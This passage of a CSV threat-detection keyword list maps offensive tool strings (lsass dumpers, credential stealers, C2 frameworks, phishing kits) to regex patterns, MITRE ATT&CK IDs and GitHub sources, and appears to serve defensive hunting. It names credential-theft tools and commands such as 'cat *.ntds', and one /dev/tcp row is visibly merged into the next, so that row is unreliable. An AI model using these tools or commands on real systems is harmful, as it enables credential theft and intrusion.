Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","606","90","2024-01-02T16:39:15Z","2020-11-02T20:02:55Z" "*CallBackDump*dumpXor*",".{0,1000}CallBackDump.{0,1000}dumpXor.{0,1000}","offensive_tool_keyword","cobaltstrike","dump lsass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 
- T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/seventeenman/CallBackDump","1","1","N/A","10","10","531","75","2023-07-20T09:03:33Z","2022-09-25T08:29:14Z" "*CallbackDump.exe*",".{0,1000}CallbackDump\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","dump lsass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/seventeenman/CallBackDump","1","1","N/A","10","10","531","75","2023-07-20T09:03:33Z","2022-09-25T08:29:14Z" "*calling MySQL shell. 
To quit type 'x' or 'q' and press ENTER*",".{0,1000}calling\sMySQL\sshell\.\sTo\squit\stype\s\'x\'\sor\s\'q\'\sand\spress\sENTER.{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Web Attacks","https://github.com/r0oth3x49/ghauri","1","0","#contentstrings","8","10","2374","235","2024-04-25T12:17:16Z","2022-10-01T11:21:50Z" "*CamHacker has a new update!*",".{0,1000}CamHacker\shas\sa\snew\supdate!.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","0","N/A","10","N/A","N/A","N/A","N/A","N/A" "*CamHacker updated successfully*",".{0,1000}CamHacker\supdated\ssuccessfully.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","0","N/A","10","N/A","N/A","N/A","N/A","N/A" "*CamHacker/releases/latest/download/websites.zip*",".{0,1000}CamHacker\/releases\/latest\/download\/websites\.zip.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. 
If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","1","N/A","10","N/A","N/A","N/A","N/A","N/A" "*can now impersonate users on * via S4U2Proxy*",".{0,1000}can\snow\simpersonate\susers\son\s.{0,1000}\svia\sS4U2Proxy.{0,1000}","offensive_tool_keyword","PassTheCert","tool to authenticate to an LDAP/S server with a certificate through Schannel","T1557 - T1071 - T1021 - T1213","TA0006 - TA0008 - TA0009","N/A","N/A","Lateral Movement","https://github.com/AlmondOffSec/PassTheCert","1","0","N/A","10","5","493","62","2023-12-18T16:05:02Z","2022-04-29T09:08:32Z" "*can_flood_frames*",".{0,1000}can_flood_frames.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*Cancelling the password spray.*",".{0,1000}Cancelling\sthe\spassword\sspray\..{0,1000}","offensive_tool_keyword","DomainPasswordSpray","DomainPasswordSpray is a tool written in PowerShell to perform a password spray attack against users of a domain.","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/DomainPasswordSpray","1","0","N/A","10","10","1636","362","2023-09-22T22:13:14Z","2016-10-04T23:37:37Z" "*CandyPotato.exe *",".{0,1000}CandyPotato\.exe\s.{0,1000}","offensive_tool_keyword","CandyPotato","CandyPotato - Pure C++ weaponized fully automated implementation of RottenPotatoNG. 
This tool has been made on top of the original JuicyPotato with the main focus on improving and adding some functionalities which was lacking","T1547.004","TA0002","N/A","N/A","Exploitation tools","https://github.com/klezVirus/CandyPotato","1","0","N/A","N/A","3","295","68","2021-09-16T17:08:52Z","2020-08-21T17:14:30Z" "*canix1/ADACLScanner*",".{0,1000}canix1\/ADACLScanner.{0,1000}","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .","T1222 - T1069 - T1018","TA0002 - TA0007 - TA0043","N/A","N/A","Discovery","https://github.com/canix1/ADACLScanner","1","1","AD Enumeration","7","10","906","155","2023-09-12T21:35:21Z","2017-04-06T12:28:37Z" "*can-kat/cstealer*",".{0,1000}can\-kat\/cstealer.{0,1000}","offensive_tool_keyword","cstealer","stealer discord token grabber, crypto wallet stealer, cookie stealer, password stealer, file stealer etc. app written in Python.","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/can-kat/cstealer","1","1","N/A","10","8","756","389","2024-04-26T21:18:07Z","2021-08-03T00:52:45Z" "*cannot encode the shellcode when self-executing the payload*",".{0,1000}cannot\sencode\sthe\sshellcode\swhen\sself\-executing\sthe\spayload.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1027 - T1045 - T1055 - T1140 - T1204 - T1218","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/phra/PEzor","1","0","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "*Cannot enumerate antivirus*",".{0,1000}Cannot\senumerate\santivirus.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - 
TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","10","10","720","94","2024-03-14T21:05:13Z","2023-02-13T13:42:39Z" "*Cannot send REVSOCKS_NORMAL handshake!*",".{0,1000}Cannot\ssend\sREVSOCKS_NORMAL\shandshake!.{0,1000}","offensive_tool_keyword","revsocks","Cross-platform SOCKS5 proxy server program/library written in C that can also reverse itself over a firewall.","T1572 - T1090 - T1071","TA0001 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/emilarner/revsocks","1","0","https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/iran-apt-seedworm-africa-telecoms","10","10","28","4","2022-08-08T07:59:16Z","2022-03-29T22:12:18Z" "*Cannot start wstunnel server:*",".{0,1000}Cannot\sstart\swstunnel\sserver\:.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","10","10","3088","282","2024-05-01T13:54:55Z","2016-05-14T23:58:43Z" "*Can't find DHCP Server PID. Exiting.*",".{0,1000}Can\'t\sfind\sDHCP\sServer\sPID\.\sExiting\..{0,1000}","offensive_tool_keyword","StealDhcpSecrets","DHCP Server DNS Password Stealer","T1552 - T1003","TA0006","N/A","N/A","Credential Access","https://github.com/gtworek/PSBits/tree/master/PasswordStealing/DHCP","1","0","content","10","10","2977","500","2024-04-26T20:31:04Z","2019-06-29T13:22:36Z" "*capcom_sys_exec*",".{0,1000}capcom_sys_exec.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*capcom_sys_exec.x64.dll*",".{0,1000}capcom_sys_exec\.x64\.dll.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*CaptainNox/Hypnos*",".{0,1000}CaptainNox\/Hypnos.{0,1000}","offensive_tool_keyword","Hypnos","indirect syscalls - the Win API functions are not hooked by AV/EDR - bypass EDR detections","T1055.012 - T1136.001 - T1070.004 - T1055.001","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/CaptainNox/Hypnos","1","1","N/A","10","1","50","6","2024-02-12T17:51:24Z","2023-07-11T09:07:10Z" "*captcha-killer.*.jar*",".{0,1000}captcha\-killer\..{0,1000}\.jar.{0,1000}","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/Mr-xn/BurpSuite-collections","1","1","N/A","N/A","10","3044","627","2023-08-04T13:50:07Z","2020-01-25T02:07:37Z" "*capture/lockout_keylogger*",".{0,1000}capture\/lockout_keylogger.{0,1000}","offensive_tool_keyword","metasploit-payloads","shell payload","T1059.001 - T1027 - T1210.001","TA0002 - TA0003 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/rapid7/metasploit-payloads","1","0","N/A","10","10","1659","656","2024-04-18T10:56:49Z","2014-04-03T21:18:24Z" "*CapturedCredential.cs*",".{0,1000}CapturedCredential\.cs.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - 
T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","4000","744","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*CapturedCredential.exe*",".{0,1000}CapturedCredential\.exe.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","4000","744","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*CapturedHashCredential.*",".{0,1000}CapturedHashCredential\..{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","4000","744","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*CapturedPasswordCredential.*",".{0,1000}CapturedPasswordCredential\..{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","4000","744","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*CapturedTicketCredential.*",".{0,1000}CapturedTicketCredential\..{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 
- T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","4000","744","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*capturetokenphish.ps1*",".{0,1000}capturetokenphish\.ps1.{0,1000}","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/rvrsh3ll/TokenTactics","1","1","N/A","N/A","6","539","85","2023-11-04T19:29:55Z","2021-07-08T02:28:12Z" "*capturetokenphish.py*",".{0,1000}capturetokenphish\.py.{0,1000}","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/rvrsh3ll/TokenTactics","1","1","N/A","N/A","6","539","85","2023-11-04T19:29:55Z","2021-07-08T02:28:12Z" "*CarbonCopy*",".{0,1000}CarbonCopy.{0,1000}","offensive_tool_keyword","CarbonCopy","A tool which creates a spoofed certificate of any online website and signs an Executable for AV Evasion. 
Works for both Windows and Linux","T1606 - T1553 - T1105 - T1027 - T1562","TA0002 - TA0008 - TA0011","N/A","N/A","Exploitation tools","https://github.com/paranoidninja/CarbonCopy","1","0","N/A","N/A","10","1260","276","2020-10-03T03:23:20Z","2018-11-14T04:48:10Z" "*CarbonCopy.py*",".{0,1000}CarbonCopy\.py.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*cardano2john.py*",".{0,1000}cardano2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*careCrow*_linux_amd64*",".{0,1000}careCrow.{0,1000}_linux_amd64.{0,1000}","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca 
- Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","1","N/A","10","10","2662","492","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" "*cargo install glit*",".{0,1000}cargo\sinstall\sglit.{0,1000}","offensive_tool_keyword","glit","Retrieve all mails of users related to a git repository a git user or a git organization","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/glit","1","0","N/A","8","1","41","6","2024-05-01T15:07:51Z","2022-11-14T11:25:10Z" "*carlospolop/PurplePanda*",".{0,1000}carlospolop\/PurplePanda.{0,1000}","offensive_tool_keyword","PurplePanda","This tool fetches resources from different cloud/saas applications focusing on permissions in order to identify privilege escalation paths and dangerous permissions in the cloud/saas configurations. Note that PurplePanda searches both privileges escalation paths within a platform and across platforms.","T1595 - T1078 - T1583 - T1087 - T1526","TA0003 - TA0004 - TA0007 - TA0040","N/A","N/A","Exploitation tools","https://github.com/carlospolop/PurplePanda","1","1","N/A","N/A","7","630","79","2024-02-01T15:17:31Z","2022-01-01T12:10:40Z" "*cat *.bin | base64 -w 0 > *.txt*",".{0,1000}cat\s.{0,1000}\.bin\s\|\sbase64\s\-w\s0\s\>\s.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","cobaltstrike","CACTUSTORCH: Payload Generation for Adversary Simulations","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - 
T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mdsecactivebreach/CACTUSTORCH","1","0","N/A","10","10","988","223","2018-07-03T06:47:36Z","2017-07-04T10:20:34Z" "*cat *.ntds",".{0,1000}cat\s.{0,1000}\.ntds","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*cat ./apache-tomcat-8.5.77/webapps/ROOT/tomcatwar.jsp",".{0,1000}cat\s\.\/apache\-tomcat\-8\.5\.77\/webapps\/ROOT\/tomcatwar\.jsp","offensive_tool_keyword","spring-core-rce","CVE-2022-22965 : about spring core rce","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tools","https://github.com/Mr-xn/spring-core-rce","1","0","N/A","N/A","1","51","18","2022-04-01T15:34:03Z","2022-03-30T14:35:00Z" "*cat > /dev/tcp/127.0.0.1*<\s\/dev\/tcp\/127\.0\.0\.1.{0,1000}\<\*",".{0,1000}catchetumbotifyoucan\>.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a 
tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*catphish.rb*",".{0,1000}catphish\.rb.{0,1000}","offensive_tool_keyword","catphish","Generate similar-looking domains for phishing attacks. Check expired domains and their categorized domain status to evade proxy categorization. Whitelisted domains are perfect for your C2 servers. Perfect for Red Team engagements.","T1565 - T1566 - T1567 - T1596","TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/ring0lab/catphish","1","1","N/A","N/A","6","594","123","2018-10-16T12:57:25Z","2016-10-24T22:48:51Z" "*catspin.sh http*",".{0,1000}catspin\.sh\shttp.{0,1000}","offensive_tool_keyword","catspin","Catspin rotates the IP address of HTTP requests making IP based blocks or slowdown measures ineffective. It is based on AWS API Gateway and deployed via AWS Cloudformation.","T1027 - T1071 - T1047 - T1090","TA0042 - TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/rootcathacking/catspin","1","0","N/A","9","3","252","32","2024-03-01T09:25:02Z","2022-07-26T08:08:33Z" "*catspin.sh -info*",".{0,1000}catspin\.sh\s\-info.{0,1000}","offensive_tool_keyword","catspin","Catspin rotates the IP address of HTTP requests making IP based blocks or slowdown measures ineffective. 
It is based on AWS API Gateway and deployed via AWS Cloudformation.","T1027 - T1071 - T1047 - T1090","TA0042 - TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/rootcathacking/catspin","1","0","N/A","9","3","252","32","2024-03-01T09:25:02Z","2022-07-26T08:08:33Z" "*catspin.sh -kill*",".{0,1000}catspin\.sh\s\-kill.{0,1000}","offensive_tool_keyword","catspin","Catspin rotates the IP address of HTTP requests making IP based blocks or slowdown measures ineffective. It is based on AWS API Gateway and deployed via AWS Cloudformation.","T1027 - T1071 - T1047 - T1090","TA0042 - TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/rootcathacking/catspin","1","0","N/A","9","3","252","32","2024-03-01T09:25:02Z","2022-07-26T08:08:33Z" "*catspin.sh -run *",".{0,1000}catspin\.sh\s\-run\s.{0,1000}","offensive_tool_keyword","catspin","Catspin rotates the IP address of HTTP requests making IP based blocks or slowdown measures ineffective. It is based on AWS API Gateway and deployed via AWS Cloudformation.","T1027 - T1071 - T1047 - T1090","TA0042 - TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/rootcathacking/catspin","1","0","N/A","9","3","252","32","2024-03-01T09:25:02Z","2022-07-26T08:08:33Z" "*catspin_for_readme.mp4*",".{0,1000}catspin_for_readme\.mp4.{0,1000}","offensive_tool_keyword","catspin","Catspin rotates the IP address of HTTP requests making IP based blocks or slowdown measures ineffective. It is based on AWS API Gateway and deployed via AWS Cloudformation.","T1027 - T1071 - T1047 - T1090","TA0042 - TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/rootcathacking/catspin","1","0","N/A","9","3","252","32","2024-03-01T09:25:02Z","2022-07-26T08:08:33Z" "*catspin_poc.mp4*",".{0,1000}catspin_poc\.mp4.{0,1000}","offensive_tool_keyword","catspin","Catspin rotates the IP address of HTTP requests making IP based blocks or slowdown measures ineffective. 
It is based on AWS API Gateway and deployed via AWS Cloudformation.","T1027 - T1071 - T1047 - T1090","TA0042 - TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/rootcathacking/catspin","1","0","N/A","9","3","252","32","2024-03-01T09:25:02Z","2022-07-26T08:08:33Z" "*catspin_poc_final.mp4*",".{0,1000}catspin_poc_final\.mp4.{0,1000}","offensive_tool_keyword","catspin","Catspin rotates the IP address of HTTP requests making IP based blocks or slowdown measures ineffective. It is based on AWS API Gateway and deployed via AWS Cloudformation.","T1027 - T1071 - T1047 - T1090","TA0042 - TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/rootcathacking/catspin","1","0","N/A","9","3","252","32","2024-03-01T09:25:02Z","2022-07-26T08:08:33Z" "*CB 4D 85 D2 74 10 41 8A 00 4D 03 C3 88 02 49 03 D3 4D 2B D3*",".{0,1000}CB\s4D\s85\sD2\s74\s10\s41\s8A\s00\s4D\s03\sC3\s88\s02\s49\s03\sD3\s4D\s2B\sD3.{0,1000}","offensive_tool_keyword","metasploit","metasploit command lines patterns","T1573.002 - T1021","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation Tools","https://github.com/rapid7/metasploit-framework","1","0","#yara rule","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*cb0a620a960506193df32016f825248dec7fe504d8b857ee54a88ad1bdf8d9ce*",".{0,1000}cb0a620a960506193df32016f825248dec7fe504d8b857ee54a88ad1bdf8d9ce.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*cb0bdce759cc157371559d3a570630af5bc64c050a7cc79ef95062d3d0db987e*",".{0,1000}cb0bdce759cc157371559d3a570630af5bc64c050a7cc79ef95062d3d0db987e.{0,1000}","offensive_tool_keyword","sliver","Sliver is an 
open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*cb12cf3f7f44250c5a2142d506921aa3c2ae8a1c6ef2f3781b3bf2ae7eb6cad4*",".{0,1000}cb12cf3f7f44250c5a2142d506921aa3c2ae8a1c6ef2f3781b3bf2ae7eb6cad4.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - 